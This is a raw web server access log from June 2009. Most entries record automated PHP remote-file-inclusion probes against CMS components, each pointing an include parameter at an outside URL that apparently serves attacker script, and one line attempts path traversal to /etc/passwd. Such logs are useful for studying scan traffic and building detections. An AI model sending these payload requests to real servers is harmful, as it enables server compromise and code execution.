77.221.130.17 - - [15/Jun/2009:02:17:01 -0400] "GET ///include/print_category.php?setup[use_category]=1&dir=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.221.130.17 - - [15/Jun/2009:02:17:01 -0400] "GET /logs/access_log.Q109051700%20%20///include/print_category.php?setup[use_category]=1&dir=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
77.221.130.17 - - [15/Jun/2009:02:17:01 -0400] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
77.221.130.17 - - [15/Jun/2009:02:17:09 -0400] "GET /logs/access_log.Q109050700%20%20///include/print_category.php?setup[use_category]=1&dir=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:02:17:11 -0400] "GET /show_news.php?cutepath=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:02:17:11 -0400] "GET /logs/access_log.Q109051100/show_news.php?cutepath=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:02:17:11 -0400] "GET /logs/show_news.php?cutepath=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:02:17:12 -0400] "GET /logs/access_log.Q109060300%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
200.54.154.10 - - [15/Jun/2009:02:17:35 -0400] "GET /logs/access_log.Q109050300%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
88.84.128.40 - - [15/Jun/2009:02:17:36 -0400] "GET //login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
88.84.128.40 - - [15/Jun/2009:02:17:36 -0400] "GET /logs/access_log.Q109050300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.84.128.40 - - [15/Jun/2009:02:17:36 -0400] "GET /logs//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
88.84.128.40 - - [15/Jun/2009:02:17:43 -0400] "GET /logs/access_log.Q109060300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.54.154.10 - - [15/Jun/2009:02:18:13 -0400] "GET /logs/access_log.Q109050700%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:02:18:14 -0400] "GET /logs/access_log.Q109060500%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:02:18:37 -0400] "GET /logs//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:02:18:37 -0400] "GET //login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:02:18:37 -0400] "GET /logs/access_log.Q109050300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:02:18:48 -0400] "GET /logs/access_log.Q109060300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:02:19:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.17.151 - - [15/Jun/2009:02:19:32 -0400] "GET /logs/error_log.Q109051200 HTTP/1.0" 200 4570374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.54 - - [15/Jun/2009:02:19:34 -0400] "GET /images/index_rcm_over.jpg HTTP/1.1" 200 1953 "-" "Googlebot-Image/1.0"
84.201.208.50 - - [15/Jun/2009:02:19:47 -0400] "GET /logs/access_log.Q109050300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:02:19:47 -0400] "GET //login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:02:19:47 -0400] "GET /logs//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:02:19:56 -0400] "GET /logs/access_log.Q109060300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.6.17.151 - - [15/Jun/2009:02:19:32 -0400] "GET /logs/error_log.Q109051200 HTTP/1.0" 200 4570374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
151.1.154.24 - - [15/Jun/2009:02:20:02 -0400] "GET /logs/error_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
151.1.154.24 - - [15/Jun/2009:02:20:02 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
151.1.154.24 - - [15/Jun/2009:02:20:02 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
211.239.150.144 - - [15/Jun/2009:02:20:41 -0400] "GET //components/com_flyspray/startdown.php?file=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.239.150.144 - - [15/Jun/2009:02:20:41 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.239.150.144 - - [15/Jun/2009:02:20:41 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
77.221.130.17 - - [15/Jun/2009:02:20:52 -0400] "GET /logs/access_log.Q109053100/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.221.130.17 - - [15/Jun/2009:02:20:52 -0400] "GET /logs/access_log.Q109052600/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.221.130.17 - - [15/Jun/2009:02:20:52 -0400] "GET /include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.221.130.17 - - [15/Jun/2009:02:20:52 -0400] "GET /logs/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.243.235.186 - - [15/Jun/2009:02:20:55 -0400] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 231 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
77.243.235.186 - - [15/Jun/2009:02:20:55 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 230 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
209.59.12.99 - - [15/Jun/2009:02:24:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.17 - - [15/Jun/2009:02:24:37 -0400] "GET /logs/access_log.Q109052600%20%20/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
77.221.130.17 - - [15/Jun/2009:02:24:37 -0400] "GET /logs/access_log.Q109053100%20%20/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
151.1.154.24 - - [15/Jun/2009:02:25:05 -0400] "GET /logs/error_log.Q109030300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
218.146.231.193 - - [15/Jun/2009:02:25:11 -0400] "GET /logs/access_log.Q109052900//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/bratid.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.65"
218.146.231.193 - - [15/Jun/2009:02:25:12 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/bratid.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
218.146.231.193 - - [15/Jun/2009:02:25:13 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/bratid.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
218.146.231.193 - - [15/Jun/2009:02:25:21 -0400] "GET /logs/access_log.Q109052900//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/bratid.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.65"
218.146.231.193 - - [15/Jun/2009:02:25:21 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/bratid.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
218.146.231.193 - - [15/Jun/2009:02:25:22 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/bratid.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
190.54.28.163 - - [15/Jun/2009:02:25:26 -0400] "GET /logs/access_log.Q109052900//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:02:25:31 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:02:25:36 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
208.80.195.27 - - [15/Jun/2009:02:25:43 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; ImageShack Toolbar 3.0.3; yplus 5.1.04b)"
66.70.14.90 - - [15/Jun/2009:02:27:08 -0400] "GET /http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
66.70.14.90 - - [15/Jun/2009:02:28:44 -0400] "GET /logs/access_log.Q109051100/http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
66.70.14.90 - - [15/Jun/2009:02:28:44 -0400] "GET /http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
66.70.14.90 - - [15/Jun/2009:02:28:44 -0400] "GET /logs/http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
209.59.12.99 - - [15/Jun/2009:02:29:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.145.152.113 - - [15/Jun/2009:02:29:37 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:02:29:37 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:02:29:37 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
77.221.130.17 - - [15/Jun/2009:02:29:44 -0400] "GET /logs/access_log.Q109051700///include/print_category.php?setup[use_category]=1&dir=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
77.221.130.17 - - [15/Jun/2009:02:29:55 -0400] "GET /logs/access_log.Q109050700///include/print_category.php?setup[use_category]=1&dir=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:02:30:09 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.70.14.90 - - [15/Jun/2009:02:30:37 -0400] "GET /logs/access_log.Q109052800/http://www.pricesucker.eu//includes/idx? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
62.212.64.10 - - [15/Jun/2009:02:31:20 -0400] "GET /logs/access_log.Q109060900/index.php?redir=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.63"
62.212.64.10 - - [15/Jun/2009:02:31:20 -0400] "GET /index.php?redir=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.63"
62.212.64.10 - - [15/Jun/2009:02:31:20 -0400] "GET /logs/index.php?redir=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.63"
62.212.64.10 - - [15/Jun/2009:02:31:23 -0400] "GET /logs/access_log.Q108112300/index.php?redir=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.63"
211.239.150.144 - - [15/Jun/2009:02:31:26 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.105.207.244 - - [15/Jun/2009:02:31:41 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cofeland.ru///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
200.105.207.244 - - [15/Jun/2009:02:31:41 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cofeland.ru///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.105.207.244 - - [15/Jun/2009:02:31:41 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://www.cofeland.ru///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.105.207.244 - - [15/Jun/2009:02:31:42 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.cofeland.ru///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.165.73.157 - - [15/Jun/2009:02:31:53 -0400] "GET /logs/access_log.Q109060900/index.php?_SERVER[DOCUMENT_ROOT]=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [15/Jun/2009:02:31:53 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.165.73.157 - - [15/Jun/2009:02:31:53 -0400] "GET /logs/access_log.Q109060800/index.php?_SERVER[DOCUMENT_ROOT]=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [15/Jun/2009:02:31:54 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
62.212.64.10 - - [15/Jun/2009:02:32:01 -0400] "GET /logs/access_log.Q109060900%20/index.php?redir=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.63"
62.212.64.10 - - [15/Jun/2009:02:32:01 -0400] "GET /logs/access_log.Q108112300%20/index.php?redir=http://www.ackerbell.com/en/images/p/log.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.63"
79.174.72.67 - - [15/Jun/2009:02:32:19 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
74.6.17.151 - - [15/Jun/2009:02:32:34 -0400] "GET /logs/error_log.Q109051500 HTTP/1.0" 200 6964123 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.151 - - [15/Jun/2009:02:32:35 -0400] "GET /logs/error_log.Q109051500 HTTP/1.0" 200 6964123 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.34.167.192 - - [15/Jun/2009:02:35:18 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://glassmac.com/bbs/data/roscanid.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
193.34.167.192 - - [15/Jun/2009:02:35:18 -0400] "GET /?sourcedir=http://glassmac.com/bbs/data/roscanid.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.808"
200.142.148.142 - - [15/Jun/2009:02:35:18 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.142.148.142 - - [15/Jun/2009:02:35:18 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
193.34.167.192 - - [15/Jun/2009:02:35:18 -0400] "GET /logs/?sourcedir=http://glassmac.com/bbs/data/roscanid.txt?? HTTP/1.1" 200 5572 "-" "libwww-perl/5.808"
74.6.17.151 - - [15/Jun/2009:02:35:24 -0400] "GET /images/_notes/nav_store_cart_off_r1_c5.jpg.mno HTTP/1.0" 200 211 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
190.54.28.163 - - [15/Jun/2009:02:35:45 -0400] "GET /logs/access_log.Q109052900//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:02:35:50 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:02:35:56 -0400] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
74.54.32.201 - - [15/Jun/2009:02:36:55 -0400] "GET /logs//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:02:36:55 -0400] "GET //login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:02:36:56 -0400] "GET /logs/access_log.Q109050300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.142.148.142 - - [15/Jun/2009:02:37:05 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:02:37:05 -0400] "GET /logs/access_log.Q109060300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.34.167.192 - - [15/Jun/2009:02:37:39 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://glassmac.com/bbs/data/roscanid.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
88.84.128.40 - - [15/Jun/2009:02:37:45 -0400] "GET /logs/access_log.Q109050300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.84.128.40 - - [15/Jun/2009:02:37:45 -0400] "GET //login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
88.84.128.40 - - [15/Jun/2009:02:37:45 -0400] "GET /logs//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
88.84.128.40 - - [15/Jun/2009:02:37:53 -0400] "GET /logs/access_log.Q109060300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:02:38:05 -0400] "GET /logs//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:02:38:05 -0400] "GET //login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:02:38:05 -0400] "GET /logs/access_log.Q109050300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:02:38:09 -0400] "GET /logs/access_log.Q109060300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.128.135.52 - - [15/Jun/2009:02:39:38 -0400] "GET //?path%5Bdocroot%5D=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
216.120.237.150 - - [15/Jun/2009:02:39:55 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jun/2009:02:39:55 -0400] "GET //?path%5Bdocroot%5D=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jun/2009:02:39:56 -0400] "GET /logs//?path%5Bdocroot%5D=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 200 5577 "-" "libwww-perl/5.811"
216.120.237.150 - - [15/Jun/2009:02:39:59 -0400] "GET //?path%5Bdocroot%5D=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.811"
84.201.208.50 - - [15/Jun/2009:02:40:03 -0400] "GET /logs//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:02:40:03 -0400] "GET //login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:02:40:04 -0400] "GET /logs/access_log.Q109050300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.239.227.229 - - [15/Jun/2009:02:40:04 -0400] "GET /facileforms.frame.php?ff_compath=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
222.239.227.229 - - [15/Jun/2009:02:40:04 -0400] "GET /logs/facileforms.frame.php?ff_compath=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:02:40:14 -0400] "GET /logs/access_log.Q109060300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [15/Jun/2009:02:41:08 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
65.23.158.226 - - [15/Jun/2009:02:41:08 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
65.23.158.226 - - [15/Jun/2009:02:41:09 -0400] "GET /logs/access_log.Q109050300//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
65.23.158.226 - - [15/Jun/2009:02:41:10 -0400] "GET /logs/access_log.Q109050300//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
65.23.158.226 - - [15/Jun/2009:02:41:10 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
65.23.158.226 - - [15/Jun/2009:02:41:10 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
201.232.54.48 - - [15/Jun/2009:02:41:21 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
74.54.32.201 - - [15/Jun/2009:02:41:21 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:02:41:21 -0400] "GET /logs/access_log.Q109060300//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:02:42:00 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
